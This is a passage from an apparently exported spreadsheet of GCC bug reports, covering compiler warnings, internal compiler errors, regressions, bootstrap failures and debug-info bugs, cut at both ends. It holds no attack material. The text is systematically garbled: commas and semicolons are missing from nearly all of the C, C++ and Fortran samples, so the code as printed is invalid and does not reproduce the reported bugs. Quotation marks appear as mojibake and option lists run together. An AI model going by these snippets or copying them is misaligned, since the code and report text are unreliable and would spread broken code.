warnings.cc:3: warning: â€˜iâ€™ is used uninitialised in this function
$ g++-4.2 -O -Wuninitialized -Wno-init-self -c warnings.cc 
warnings.cc: In function â€˜int f()â€™:
warnings.cc:3: warning: â€˜iâ€™ is used uninitialised in this function
Compiling the same code as C:
$ gcc-4.2 -x c -O -Wuninitialized -c warnings.cc 
$ gcc-4.2 -x c -O -Wuninitialized -Winit-self -c warnings.cc
warnings.cc: In function â€˜fâ€™:
warnings.cc:3: warning: â€˜iâ€™ is used uninitialised in this function
$
So it appears that g++ simply ignores the -Winit-self setting and always warns about such code contrary to what the documentation states (and gcc works as documented).  ObjC seems to handle this as C does (as documented).  ObjC++ seems to handle it as C++ does (contrary to documentation).
This could be viewed as a documentation bug though it seems more useful for this to work for C++ (and ObjC++) as is currently documented.
It looks like -Winit-self was new in GCC 3.4 and I can the same behaviour for C++ with g++ 3.4.4 so I don't think this is a regression.</t>
  </si>
  <si>
    <t>olly</t>
  </si>
  <si>
    <t>GCC-82837</t>
  </si>
  <si>
    <t>[8 Regression] ICE in output_operand: invalid expression as operand</t>
  </si>
  <si>
    <t>Following test-case ICEs unfortunately can't be reproduced on x86_64-linux-gnu:
$ cat /tmp/ice.i
static char b[100]
static int *c
char *e
void a(char *f char *i) {
  int d = __builtin_object_size(f 1)
  __builtin___strcpy_chk(f i d)
}
void g(void) {
  int h
  switch (*c) {
  case 8:
    e = swapgs
    break
  case 9:
    e = rdtscp
    break
  default:
    return
  }
  h = __builtin_strlen(b)
  a(b + h - 6 e)
  c++
}
$ ./xgcc -B. /tmp/ice.i -O2 -g -fPIE
/tmp/ice.i:23:1: internal compiler error: output_operand: invalid expression as operand
 }
 ^
0x86bb32f output_operand_lossage(char const* ...)
	../../gcc/final.c:3442
0x86bc7cb output_addr_const(_IO_FILE* rtx_def*)
	../../gcc/final.c:4031
0x86bc426 output_addr_const(_IO_FILE* rtx_def*)
	../../gcc/final.c:3940
0x85f09a9 dw2_assemble_integer(int rtx_def*)
	../../gcc/dwarf2asm.c:56
0x85f0f86 dw2_asm_output_addr_rtx(int rtx_def* char const* ...)
	../../gcc/dwarf2asm.c:305
0x85ff836 output_loc_operands
	../../gcc/dwarf2out.c:2197
0x85fff74 output_loc_sequence(dw_loc_descr_node* int)
	../../gcc/dwarf2out.c:2419
0x860ac7e output_loc_list
	../../gcc/dwarf2out.c:9851
0x86084cf output_location_lists
	../../gcc/dwarf2out.c:8451
0x8608500 output_location_lists
	../../gcc/dwarf2out.c:8453
0x8608500 output_location_lists
	../../gcc/dwarf2out.c:8453
0x8608500 output_location_lists
	../../gcc/dwarf2out.c:8453
0x863a82b dwarf2out_finish
	../../gcc/dwarf2out.c:30118</t>
  </si>
  <si>
    <t>GCC-11618</t>
  </si>
  <si>
    <t>Floating point values not reproduced at -O3 with a simple C++ copy constructor.</t>
  </si>
  <si>
    <t>I'm attaching a test file plus the .ii file which demonstrates a case where at
-O3 the compiler generates code that doesn't properly initialize floating point
values in a user-defined copy constructor.</t>
  </si>
  <si>
    <t>gtalbot</t>
  </si>
  <si>
    <t>GCC-30317</t>
  </si>
  <si>
    <t>VRP cannot extract a range from (unsigned int) i + 0x0ffffffff &gt; 4</t>
  </si>
  <si>
    <t>fold and VRP interact badly if we have a range test like
if (i &gt; 0 &amp;&amp; i &lt;=5)
  ...
as we fold that to
if ((unsigned int) i + 0x0ffffffff &gt; 4)
  ...
for which VRP fails to extract a range for i.  If we write the
range test so that fold doesn't see it VRP is happy:
if (i &gt; 0)
  if (i &lt;= 5)
    ...</t>
  </si>
  <si>
    <t>GCC-7839</t>
  </si>
  <si>
    <t>Misaligned stack in expand_call() on i386 i486 and i586</t>
  </si>
  <si>
    <t>On compiling the attached file with -march={i386i486i586} I get the following:
# gcc -march=i586 -c ice.ii
ice.ii: In member function `B D &gt;::a(B) [with int  =
   0]':
ice.ii:16:   instantiated from here
ice.ii:10: Internal compiler error in expand_call at calls.c:3049
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
This does not happen with -march &gt;= i686.
Release:
3.2.1 20020904 (prerelease) and 3.3 20020904 (experimental)
Environment:
System: Linux vodalia 2.4.18-4GB #1 Tue Jul 30 07:43:42 UTC 2002 i686 unknown
Architecture: i686
host: i486-suse-linux-gnu
build: i486-suse-linux-gnu
target: i486-suse-linux-gnu
configured with: /home/schiele/gcccvs/gcc.gcc-3_2-branch/configure --enable-threads=posix --prefix=/opt/Pkg/Linux/i686/gcc321 --enable-languages=cc++f77objc --disable-libgcj --with-gxx-include-dir=/opt/Pkg/Linux/i686/gcc321/include/g++ --with-system-zlib --enable-shared --enable-__cxa_atexit i486-suse-linux
How-To-Repeat:
gcc -march=i586 -c ice.ii</t>
  </si>
  <si>
    <t>rschiele</t>
  </si>
  <si>
    <t>GCC-10633</t>
  </si>
  <si>
    <t>linking error with stdc++ library</t>
  </si>
  <si>
    <t>undefined symbol while linking with stdc++ library
Release:
unknown
Environment:
gcc 3.2.3 on RedHat 8.0
How-To-Repeat:
Here is a simple example
test.cpp:
void operator delete[](void * pPtr) throw()
{
}
gcc -v -g -c test.cpp
ld -lc -lstdc++ -shared test.o -o test.so
ld: test.so: undefined versioned symbol name _ZdaPv@@GLIBCPP_3.2
ld: failed to set dynamic section sizes: Bad value</t>
  </si>
  <si>
    <t>cheng</t>
  </si>
  <si>
    <t>GCC-47322</t>
  </si>
  <si>
    <t>[4.6 regression] libquadmath breaks bootstrap on x86_64-unknown-freebsd8.2</t>
  </si>
  <si>
    <t>The issues is a failing definition of u_int64_t when building math/requog.lo:
libtool: compile:  /scratch/tmp/gerald/OBJ-0116-1958/./gcc/xgcc -B/scratch/tmp/g
erald/OBJ-0116-1958/./gcc/ -B/home/gerald/gcc-ref8-amd64/x86_64-unknown-freebsd8
.2/bin/ -B/home/gerald/gcc-ref8-amd64/x86_64-unknown-freebsd8.2/lib/ -isystem /h
ome/gerald/gcc-ref8-amd64/x86_64-unknown-freebsd8.2/include -isystem /home/geral
d/gcc-ref8-amd64/x86_64-unknown-freebsd8.2/sys-include -DHAVE_CONFIG_H -I. -I/sc
ratch/tmp/gerald/gcc-HEAD/libquadmath -g -O2 -MT math/lrintq.lo -MD -MP -MF math
/.deps/lrintq.Tpo -c /scratch/tmp/gerald/gcc-HEAD/libquadmath/math/lrintq.c -o m
ath/lrintq.o &gt;/dev/null 2&gt;&amp;1
/scratch/tmp/gerald/gcc-HEAD/libquadmath/math/remquoq.c: In function 'remquoq':
/scratch/tmp/gerald/gcc-HEAD/libquadmath/math/remquoq.c:32:3: error: unknown typ
e name 'u_int64_t'
gmake[3]: *** [math/remquoq.lo] Error 1
This is caused by
  2011-01-16  Jakub Jelinek  
        PR fortran/46625
        * quadmath.map (QUADMATH_1.0): Remove quadmath_strtopQ
        :</t>
  </si>
  <si>
    <t>GCC-79420</t>
  </si>
  <si>
    <t>[7 Regression] ICE on invalid C++ code on x86_64-linux-gnu: in tsubst_copy at cp/pt.c:14573</t>
  </si>
  <si>
    <t>This seems to be a recent regression. 
$ g++-trunk -v
Using built-in specs.
COLLECT_GCC=g++-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/7.0.1/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-source-trunk/configure --enable-languages=cc++lto --prefix=/usr/local/gcc-trunk --disable-bootstrap
Thread model: posix
gcc version 7.0.1 20170207 (experimental) [trunk revision 245240] (GCC)
$
$ g++-trunk -c -w small.cpp
small.cpp: In instantiation of â€˜int f() [with int  = 0]â€™:
small.cpp:8:12:   required from here
small.cpp:3:12: internal compiler error: in tsubst_copy at cp/pt.c:14573
   return f.x
          ~~^
0x6f90b0 tsubst_copy
        ../../gcc-source-trunk/gcc/cp/pt.c:14573
0x6fe380 tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool)
        ../../gcc-source-trunk/gcc/cp/pt.c:17858
0x6fe8ae tsubst_copy_and_build(tree_node* tree_node* int tree_node* bool bool)
        ../../gcc-source-trunk/gcc/cp/pt.c:17458
0x6f1957 tsubst_expr(tree_node* tree_node* int tree_node* bool)
        ../../gcc-source-trunk/gcc/cp/pt.c:16405
0x6f315c tsubst_expr(tree_node* tree_node* int tree_node* bool)
        ../../gcc-source-trunk/gcc/cp/pt.c:15666
0x6f2153 tsubst_expr(tree_node* tree_node* int tree_node* bool)
        ../../gcc-source-trunk/gcc/cp/pt.c:15882
0x6ef5b4 instantiate_decl(tree_node* bool bool)
        ../../gcc-source-trunk/gcc/cp/pt.c:22821
0x73e9a2 instantiate_pending_templates(int)
        ../../gcc-source-trunk/gcc/cp/pt.c:22942
0x783e01 c_parse_final_cleanups()
        ../../gcc-source-trunk/gcc/cp/decl2.c:4525
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$
--------------------------------
template  int f ()
{ 
  return f.x
}
void g ()
{ 
  f  ()
}</t>
  </si>
  <si>
    <t>GCC-6161</t>
  </si>
  <si>
    <t>cc1 segfault in make_reorder_chain_1</t>
  </si>
  <si>
    <t>The following small program when run with gcc segfaults when using -O2.  -O1 or less doesn't fail. 
Program t.c:
-----------
struct UI_Event {
        int device
        char id
        unsigned long scan_code
	unsigned long duration
}
unsigned char map[256]
int x(struct UI_Event* e)
{
        unsigned long fcode = 0
	if (e-&gt;scan_code == 1) {
                switch (e-&gt;device) {
                        case 1:
                                fcode = 0
                                goto done
                        case 2:
                                fcode = 1
                                goto done
                        case 3:
                                fcode = 2
                                goto done
                        case 4:
                                fcode = 3
                                goto done
                        case 5:
                                fcode = 4
                                goto done
                        case 6:
                                fcode = 5
                                goto done
                        case 7:
                                fcode = 6
                                goto done
                        default:
                                return 0
                }
	}
        for (fcode = 0 fcode &lt; 256 fcode++) {
                if (e-&gt;scan_code == map[fcode]) goto done
        }
        return 0
done:
        return 1
}
-----------
Here is the cc1 backtrace:
Program received signal SIGSEGV Segmentation fault.
0x081efcc6 in make_reorder_chain_1 (bb=0x82fd198 prev=0x0)
    at ../../gcc-3.0.4/gcc/bb-reorder.c:416
416           next = (taken ? e_taken : e_fall)-&gt;dest
(gdb) bt
#0  0x081efcc6 in make_reorder_chain_1 (bb=0x82fd198 prev=0x0)
    at ../../gcc-3.0.4/gcc/bb-reorder.c:416
#1  0x081efbb8 in make_reorder_chain () at ../../gcc-3.0.4/gcc/bb-reorder.c:328
#2  0x081f0f9e in reorder_basic_blocks ()
    at ../../gcc-3.0.4/gcc/bb-reorder.c:1365
#3  0x0807a560 in rest_of_compilation (decl=0x401c49c0)
    at ../../gcc-3.0.4/gcc/toplev.c:3631
#4  0x0805754e in c_expand_body (fndecl=0x401c49c0 nested_p=0)
    at ../../gcc-3.0.4/gcc/c-decl.c:6782
#5  0x0805742c in finish_function (nested=0)
    at ../../gcc-3.0.4/gcc/c-decl.c:6697
#6  0x08049dfc in yyparse_1 () at c-parse.y:324
#7  0x08078d1a in compile_file (name=0x82f7e92 t.c)
    at ../../gcc-3.0.4/gcc/toplev.c:2369
#8  0x0807c436 in main (argc=50 argv=0xbffff584)
    at ../../gcc-3.0.4/gcc/toplev.c:4990
#9  0x40048507 in __libc_start_main (main=0x807bd20  argc=50
    ubp_av=0xbffff584 init=0x80490b0  fini=0x81ff930 
    rtld_fini=0x4000dc14  stack_end=0xbffff57c)
    at ../sysdeps/generic/libc-start.c:129
-----------------------
Run gcc-3-0-4 with the following command line:
gcc -O2 -c t.c
to reproduce.  gcc-3-0 has the same problem.
Release:
gcc-3.0 and gcc-3.0.4
Environment:
Redhat Linux 7.2
How-To-Repeat:
Run gcc-3-0-4 with the following command line:
gcc -O2 -c t.c
to reproduce.  gcc-3-0 has the same problem.</t>
  </si>
  <si>
    <t>sstone</t>
  </si>
  <si>
    <t>GCC-35017</t>
  </si>
  <si>
    <t>[4.3 Regression] PR11377 pedwarns even about valid code</t>
  </si>
  <si>
    <t>http://gcc.gnu.org/viewcvs?root=gcc&amp;view=rev&amp;rev=118357 introduced pedwarns
about any static decls in external linkage inline functions but ISO C99 6.4.7/3
has:
An inline definition of a function with external linkage shall not contain a definition of a modifiable object with static storage duration and shall not contain a reference to an identifier with internal linkage.
In -std=c99:
inline int foo (void) { static const int c = 6 return c }
the static variable c isn't modifiable so the first condition doesn't apply
and from 6.2.2 I gather c has no linkage rather than internal linkage and so
the other condition doesn't apply either.
In -std=c99:
static const int c = 6
inline int foo (void) { return c }
I believe c has internal linkage and thus it is invalid (and therefore correctly diagnosed by the trunk).</t>
  </si>
  <si>
    <t>GCC-37845</t>
  </si>
  <si>
    <t>gcc ignores FP_CONTRACT pragma set to OFF</t>
  </si>
  <si>
    <t>To be conform to the ISO C standard (when FLT_EVAL_METHOD is 0 1 or 2 which is the case of gcc) gcc should either take FP_CONTRACT pragmas into account or (in the mean time) assume they are set to OFF i.e. disallow the contraction of floating expressions. This means in particular that -mno-fused-madd should be the default (with processors for which this option is supported e.g. PowerPC).
I've tested with gcc-4.4-20081010 on ia64 that this bug is still present.</t>
  </si>
  <si>
    <t>vincent-gcc</t>
  </si>
  <si>
    <t>GCC-19458</t>
  </si>
  <si>
    <t>[4.0 Regression] bootstrap failure</t>
  </si>
  <si>
    <t>The following testcase reduced from mulvdi3 causes an ICE.
int
foo (int c)
{
  if (c &gt;= 0)
    return 1
  else if (c == -1)
    return 1
  return 0
}
internal compiler error: in simplify_cond_and_lookup_avail_expr at
tree-ssa-dom.c:2099
Most likely this patch caused the problem.
2005-01-15  Jakub Jelinek  
	PR tree-optimization/19060
	* tree-ssa-dom.c (extract_range_from_cond) :
	Return 0 if op1 = TYPE_MAX_VALUE ().
	(simplify_cond_and_lookup_avail_expr): Add assert for dummy == 0
	and handle extract_range_from_cond returning false.
	* fold-const.c (fold): Optimize comparisons with min/max even for
	width &gt; HOST_BITS_PER_WIDE_INT.</t>
  </si>
  <si>
    <t>GCC-78063</t>
  </si>
  <si>
    <t>libbacktrace</t>
  </si>
  <si>
    <t>libbacktrace fails to handle cross CU DW_AT_abstract_origin</t>
  </si>
  <si>
    <t>Currently libbacktrace doesn't handle the pending early LTO debug way of separating early debug and late debug.  We have
  Compilation Unit @ offset 0xfcc:
   Length:        0x111 (32-bit)
   Version:       4
   Abbrev Offset: 0x362
   Pointer Size:  8
 : Abbrev Number: 1 (DW_TAG_compile_unit)
       DW_AT_producer    : (indirect string offset: 0x1574): GNU C11 7.0.0
 20161020 (experimental) -mtune=generic -march=x86-64 -g -O2 -O2 -fsanitize=addr
ess -flto -fno-use-linker-plugin -flto-partition=none
       DW_AT_language    : 12      (ANSI C99)
       DW_AT_name        : (indirect string offset: 0x1523): /space/rguent
her/src/svn/trunk/gcc/testsuite/c-c++-common/asan/misalign-1.c
...
 : Abbrev Number: 14 (DW_TAG_subprogram)
       DW_AT_external    : 1
       DW_AT_name        : foo
       DW_AT_decl_file   : 1
       DW_AT_decl_line   : 9
       DW_AT_prototyped  : 1
       DW_AT_type        : 
and
  Compilation Unit @ offset 0xe37:
   Length:        0x191 (32-bit)
   Version:       4
   Abbrev Offset: 0x296
   Pointer Size:  8
 : Abbrev Number: 1 (DW_TAG_compile_unit)
       DW_AT_producer    : (indirect string offset: 0x13c4): GNU GIMPLE 7.
0.0 20161020 (experimental) -mtune=generic -march=x86-64 -mtune=generic -march=x
86-64 -g -O2 -O2 -O2 -O2 -fmath-errno -fsigned-zeros -ftrapping-math -fno-trapv 
-fno-strict-overflow -fno-openmp -fno-openacc -fsanitize=address -fno-use-linker
-plugin -flto-partition=none
       DW_AT_language    : 12      (ANSI C99)
       DW_AT_name        : (indirect string offset: 0x14de): 
       DW_AT_comp_dir    : (indirect string offset: 0x14eb): /abuild/rguen
ther/obj/gcc
       DW_AT_ranges      : 0x40
       DW_AT_low_pc      : 0x0
       DW_AT_stmt_list   : 0x290
 : Abbrev Number: 2 (DW_TAG_imported_unit)
       DW_AT_import      :  [Abbrev Number: 1]
...
 : Abbrev Number: 3 (DW_TAG_subprogram)
       DW_AT_abstract_origin: 
       DW_AT_low_pc      : 0x400ac0
       DW_AT_high_pc     : 0x59
       DW_AT_frame_base  : 1 byte block: 9c        (DW_OP_call_frame_cfa)
       DW_AT_GNU_all_call_sites: 1
       DW_AT_sibling     : 
so we run into
static int
read_function_entry (struct backtrace_state *state struct dwarf_data *ddata
                     struct unit *u uint64_t base struct dwarf_buf *unit_buf
                     const struct line_header *lhdr
                     backtrace_error_callback error_callback void *data
                     struct function_vector *vec_function
                     struct function_vector *vec_inlined)
{
...
                case DW_AT_abstract_origin:
                case DW_AT_specification:
                  if (abbrev-&gt;attrs[i].form == DW_FORM_ref_addr
                      || abbrev-&gt;attrs[i].form == DW_FORM_ref_sig8)
                    {
                      /* This refers to an abstract origin defined in
                         some other compilation unit.  We can handle
                         this case if we must but it's harder.  */
                      break
                    }
                  if (val.encoding == ATTR_VAL_UINT
                      || val.encoding == ATTR_VAL_REF_UNIT)
                    {
                      const char *name
                      name = read_referenced_name (ddata u val.u.uint
                                                   error_callback data)
                      if (name != NULL)
                        function-&gt;name = name
                    }
which causes us to fail to specify the function name to the dwarf_lookup_pc
callback.  This causes libsanitizer to not print file/line info but fall
back to symbolic backtrace completely (it could at least preserve the
partial info I guess).  Which in turn causes most asan and tsan tests
in the testsuite to FAIL with -flto because they scan for a proper
backtrace but we get
READ of size 4 at 0x7fff24ce1c8f thread T0
    #0 0x400b18 in foo (/home/abuild/rguenther/obj/gcc/misalign-1.exe+0x400b18)
    #1 0x40092c in main (/home/abuild/rguenther/obj/gcc/misalign-1.exe+0x40092c)
instead of the desired
READ of size 4 at 0x7fff2193ea1f thread T0
    #0 0x400b98 in foo /space/rguenther/src/svn/trunk2/gcc/testsuite/c-c++-common/asan/misalign-1.c:11
    #1 0x4009af in main /space/rguenther/src/svn/trunk2/gcc/testsuite/c-c++-common/asan/misalign-1.c:35
as said libbacktrace computes file and line correctly but fails to lookup
the function DW_AT_name as that is only available in the abstract origin.</t>
  </si>
  <si>
    <t>GCC-58368</t>
  </si>
  <si>
    <t>[4.9 regression] bootstrap comparison failure in expr.o and i386.o on x86_64-linux</t>
  </si>
  <si>
    <t>Attempting to bootstrap gcc-4.9-20130908 (r202372) on x86_64-linux fails with:
make[3]: Leaving directory `/mnt/scratch/objdir49'
Comparing stages 2 and 3
warning: gcc/cc1obj-checksum.o differs
warning: gcc/cc1plus-checksum.o differs
warning: gcc/cc1objplus-checksum.o differs
warning: gcc/cc1-checksum.o differs
Bootstrap comparison failure!
gcc/expr.o differs
gcc/i386.o differs
make[2]: *** [compare] Error 1
make[2]: Leaving directory `/mnt/scratch/objdir49'
make[1]: *** [stage3-bubble] Error 2
make[1]: Leaving directory `/mnt/scratch/objdir49'
make: *** [bootstrap] Error 2
The previous weekly snapshot 4.9-20130901 bootstrapped fine.
Configuration:
/mnt/scratch/gcc-4.9-20130908/configure --prefix=/mnt/scratch/install49 --with-gmp=/home/mikpe/pkgs/linux-x86_64/gmp-5.1.2 --with-mpfr=/home/mikpe/pkgs/linux-x86_64/mpfr-3.1.2 --with-mpc=/home/mikpe/pkgs/linux-x86_64/mpc-1.0.1 --disable-plugin --disable-lto --disable-nls --enable-threads=posix --enable-checking=release --disable-libmudflap --enable-languages=cc++objcobj-c++javafortranadago</t>
  </si>
  <si>
    <t>GCC-10760</t>
  </si>
  <si>
    <t>Compile time increases quadratically with struct size</t>
  </si>
  <si>
    <t>Name lookups for struct members use linear search which can result in
quadratic compile time increase.  See also c/10675:
http://gcc.gnu.org/cgi-bin/gnatsweb.pl?cmd=view%20audit-trail&amp;database=gcc&amp;pr=10675
http://gcc.gnu.org/ml/gcc-bugs/2003-05/msg01072.html
This happens in both c and c++ but I can only specify one category.
Release:
gcc version 3.3 20030512 (prerelease)
Environment:
System: x86/Linux &amp; PowerPC/AIX
How-To-Repeat:
The following is a shell script that will generate a struct with a
given number of members and a functions that assings zero to all
members.
------- BEGIN biggen.sh -------------
#! /bin/sh
let i=0
echo 'struct foo {'
while [ $i -lt $1 ]
do
    echo     int i_$((i=i+1))
done
echo '}'
#echo 'struct foo f'
let i=0
echo 'void init_foo(struct foo *p) {'
while [ $i -lt $1 ]
do
    echo     p-&gt;i_$((i=i+1)) = 0
done
echo '}'
--------- END biggen.sh -------------
Run it like this:
./biggen.sh 10000 &gt; big.C time g++ -c big.c
Change the number from 10000 and see how the compile time is
affected.  Also watch the memory usage e.g. with 25000 members it
needs 55M but the memory usage scales linearly.</t>
  </si>
  <si>
    <t>hzoli</t>
  </si>
  <si>
    <t>GCC-30430</t>
  </si>
  <si>
    <t>Memory corruption in the module search path code</t>
  </si>
  <si>
    <t>$ cat a.f90 
module truc
end module truc
module bar
  use truc
end module bar
use bar
end
$ gfortran a.f90
$ gfortran a.f90 -Jfoo
f951(1968) malloc: *** Deallocation of a pointer not malloced: 0x41304a90 This could be a double free() or free() called with the middle of an allocated block Try setting environment variable MallocHelp to see tools to help debug
It's on powerpc-darwin but it's not target-specific I guess running under libefence or valgrind would show the same thing. Treat that as an ICE since it's a potential ICE.</t>
  </si>
  <si>
    <t>GCC-33921</t>
  </si>
  <si>
    <t>FAIL: gcc.dg/debug/debug-6.c -gdwarf-2 -O scan-assembler xyzzy</t>
  </si>
  <si>
    <t>Executing on host: /home/dave/gcc-4.3/objdir/gcc/xgcc -B/home/dave/gcc-4.3/objdi
r/gcc/ /home/dave/gcc-4.3/gcc/gcc/testsuite/gcc.dg/debug/debug-6.c  -gdwarf-2 -d
A -fno-show-column -S  -o debug-6.s    (timeout = 300)
PASS: gcc.dg/debug/debug-6.c -gdwarf-2 (test for excess errors)
PASS: gcc.dg/debug/debug-6.c -gdwarf-2 scan-assembler xyzzy
Testing debug/debug-6.c -gdwarf-2 -O
xyzzy is not in .s file.
Fails at -O and above.
dave@gsyprf11:~/gcc-4.3/objdir/gcc$ ./xgcc -B./ -v
Reading specs from ./specs
Target: hppa-linux
Configured with: ../gcc/configure --with-gnu-as --with-gnu-ld --enable-shared --enable-nls --prefix=/home/dave/opt/gnu/gcc/gcc-4.3.0 --with-local-prefix=/home/dave/opt/gnu --enable-threads=posix --enable-__cxa_atexit --build=hppa-linux --enable-clocale=gnu --enable-java-gc=boehm --enable-java-awt=xlib --enable-languages=cc++objcfortranadaobj-c++java
Thread model: posix
gcc version 4.3.0 20071026 (experimental) [trunk revision 129664] (GCC)
Revision 129643 was ok.</t>
  </si>
  <si>
    <t>GCC-26651</t>
  </si>
  <si>
    <t>[gomp] #omp for ordered leaks memory</t>
  </si>
  <si>
    <t>int main()
{
#pragma omp parallel
  {
#pragma omp for ordered
    for(int i = 0 i &lt; 1 i++)
  }
}
produces 44 bytes memory leak because after the omp for ordered gomp_work_share_start() gets called and allocs a struct gomp_work_share
which never gets freed because neither gomp_work_share_end() nor gomp_work_share_end_nowait() is called at the end of the for loop.</t>
  </si>
  <si>
    <t>GCC-38952</t>
  </si>
  <si>
    <t>[4.4 Regression] EH does not work.</t>
  </si>
  <si>
    <t>SjLj EH (the default) is completely broken on Cygwin (and MinGW confirmed by Danny in private email).
  The failures have been occurring since at least November: see e.g.
http://gcc.gnu.org/ml/gcc-testresults/2008-11/msg02144.html
(The distro maintainers have all been so focussed recently on getting DW2 EH to work on our platforms that this flew in under our radar sorry for not noticing sooner).
  A simple test case and some complicated low-level analysis will follow in comments and attachments.  So far it looks like an error in frame pointer elimination caused by a miscalculation of the initial frame pointer offset.  I have filed this as a target problem since elimination is driven by the backend but it could just as well be a bug in rtl-optimisation we'll know more soon.
  cheers
    DaveK</t>
  </si>
  <si>
    <t>GCC-11743</t>
  </si>
  <si>
    <t>ICE with typeof applied to template parameter dependant expression</t>
  </si>
  <si>
    <t>See attachments</t>
  </si>
  <si>
    <t>GCC-36299</t>
  </si>
  <si>
    <t>spurious and undocumented warning with -Waddress for a == 0 when a is an array</t>
  </si>
  <si>
    <t>With -Waddress (implied by -Wall) I get the following warning when I use the test a == 0 where a is an array: the address of 'a' will never be NULL. This behavior is undocumented and inconsistent (see below). Here's a testcase:
int main (void)
{
  char a[1] *b
  b = a
  if (a == 0)
    return 1
  else if (a == (void *) 0)
    return 2
  else if (b == 0)
    return 3
  else if (b == (void *) 0)
    return 4
  return 0
}
gcc warns only for a == 0 (and this is OK to use 0 instead of (void *) 0 because it is a valid form for a null pointer constant).
Moreover this is very similar to code like
  if (1) ...
or code given in bug 12963 for which gcc no longer emits warnings: indeed such kind of correct and useful code is typically used in macros.</t>
  </si>
  <si>
    <t>GCC-29528</t>
  </si>
  <si>
    <t>[ecj] update gcjh documentation</t>
  </si>
  <si>
    <t>gcjh has been removed from the gcj-eclipse branch but the documentation
remains.  Once we've imported a new Classpath (and with it the new gcjh)
we must update the documentation to reflect the changes.
Probably this documentation should be pushed upstream to Classpath.</t>
  </si>
  <si>
    <t>GCC-58975</t>
  </si>
  <si>
    <t>Builtin function RAN() interferes with F77 program's own definition of INTEGER FUNCTION RAN()</t>
  </si>
  <si>
    <t>Related to Bug 14993.
Adventure II works perfectly with the old f77 compiler but crashes under gfortran.
http://www.mipmip.org/adv440/index.shtml
http://www.ifarchive.org/if-archive/games/source/adv440.tgz
If you compile the above-linked Fortran 77 program (advII.f) with gfortran 4.8.1 you'll observe that it crashes every time the player enters an area forbidden to dwarves. This is because that particular computation involves random number generation which in advII.f is implemented like this:
      INTEGER FUNCTION RAN(IR)
      [...snip...]
      IRAN=MOD(R173)
      RAN=MOD(RIR)
      RETURN
      END
and used like this:
      PCT(N)=RAN(100).LT.N
The problem is that the call to RAN(100) above is being turned into a call to the RAN() built-in real-valued function rather than the integer function defined above. This leads to nonsensical codegen.
When a Fortran 77 program defines its own version of RAN() the program's version should override the compiler's built-in.</t>
  </si>
  <si>
    <t>GCC-1036</t>
  </si>
  <si>
    <t>I have defined a variable called 'aoa' of type 'double'.
I pass this variable as an argument to a function. When I
am passing 'aoa.' to the function (instead of 'aoa') I get
the following error message:
txaa_dl.c: In function `int main()':
txaa_dl.c:74: Internal compiler error.
txaa_dl.c:74: Please submit a full bug report.
txaa_dl.c:74: See  for instructions.
*** Error code 1
make: Fatal error: Command failed for target `txaa_dl'
I am using the following command (in a Makefile) to compile
the txaa_dl.c file (which contains my main function):
g++ -g -o txaa_dl txaa_dl.c
Release:
gcc version 2.95.2 19991024 (release)
Environment:
sparc-sun-solaris2.6
How-To-Repeat:
Define a very simple function that needs an argument of type
'double'. Define a double variable let's say:
double myvar
Call the function with 'myvar.' as its argument.
This should produce the above Internal error.</t>
  </si>
  <si>
    <t>ack</t>
  </si>
  <si>
    <t>GCC-25276</t>
  </si>
  <si>
    <t>[4.2 regression] testsuite failure: execution gcc.dg/attr-weakref-1.c</t>
  </si>
  <si>
    <t>Last known to work with: Mon Dec  5 12:27:13 UTC 2005 (revision 108052M).
First known to fail with: Mon Dec  5 22:19:13 UTC 2005 (revision 108077M).
Running /home/hp/combined/combined/gcc/testsuite/gcc.dg/dg.exp ...
...
FAIL: gcc.dg/attr-weakref-1.c execution test
With the message in the .log being:
program stopped with signal 6.
(i.e. abort was called)
Author of suspected patches CC:ed.</t>
  </si>
  <si>
    <t>GCC-11239</t>
  </si>
  <si>
    <t>java.awt.datatransfer.DataFlavor.isMimeTypeEqual final so Java Activation Framework doesn't compile</t>
  </si>
  <si>
    <t>When trying to compile the Java Activation Framework and JavaMail using GCJ to 
an object file the error message below is displayed. I checked the class 
referenced in the include/java folder but there was nothing I could see to 
suggest final behaviour on the header file.
I've tried this with a copy of GCJ built from CVS and the same message is 
returned.
[rickk@gw tomcat]$ make mail.o
gcj -O2 -march=athlon  --classpath=./mail -o mail.o -
c ./mail/javax/mail/*.java ./mail/javax/mail/*/*.java ./mail/javax/activation/*.
java ./mail/com/*/*/*/*.java ./mail/com/*/*/*/*/*.java
./mail/javax/activation/ActivationDataFlavor.java:180: error: Final methods 
can't be overriden. Method `java.awt.datatransfer.DataFlavor.isMimeTypeEqual
(java.lang.String)' is final in class `java.awt.datatransfer.DataFlavor'.
       public boolean isMimeTypeEqual(String mimeType) {
                      ^
1 error
make: *** [mail.o] Error 1
GCC Compile info:
Configured with: ../gcc-3.3/configure --prefix=/usr/local/gcc-33 --enable-
shared --enable-languages=cc++objcjava --enable-threads=posix --enable-
__cxa_atexit --enable-clocale=gnu
Thread model: posix
gcc version 3.3
System is: Linux 2.4.21 2xAthlonMP CPU GLibc 2.3.2.
I've tried this with both the source code and the compiled activation.jar 
supplied with Tomcat and both give the same results.  I'm not sure whether 
this is an environment error or something in libgcj but in any case I'd like 
to fix it.
Looking forward to your response. By the way ... what is a 
host/target/build triplet ?</t>
  </si>
  <si>
    <t>rick</t>
  </si>
  <si>
    <t>GCC-13076</t>
  </si>
  <si>
    <t>gnatlib can't be built cross</t>
  </si>
  <si>
    <t>configure --target=i386-rtems --enable-languages=cada --with-newlib ...
# make -C gcc gnatlib
...
../../xgcc -B../../ -c -DCROSS_COMPILE -DIN_GCC   `echo -g -O2  -fexceptions -DI
N_RTS |sed -e 's/-pedantic//g' -e 's/-Wtraditional//g'`      \
         -I. -I.. -I../.. -I/users/rtems/src/packages/BUILD/rtems-4.7-i386-rtems
4.7-gcc-newlib-gcc3.3.2newlib1.11.0/gcc-3.3.2/gcc/ada -I/users/rtems/src/package
s/BUILD/rtems-4.7-i386-rtems4.7-gcc-newlib-gcc3.3.2newlib1.11.0/gcc-3.3.2/gcc/ad
a/.. -I/users/rtems/src/packages/BUILD/rtems-4.7-i386-rtems4.7-gcc-newlib-gcc3.3
.2newlib1.11.0/gcc-3.3.2/gcc/ada/../config -I/users/rtems/src/packages/BUILD/rte
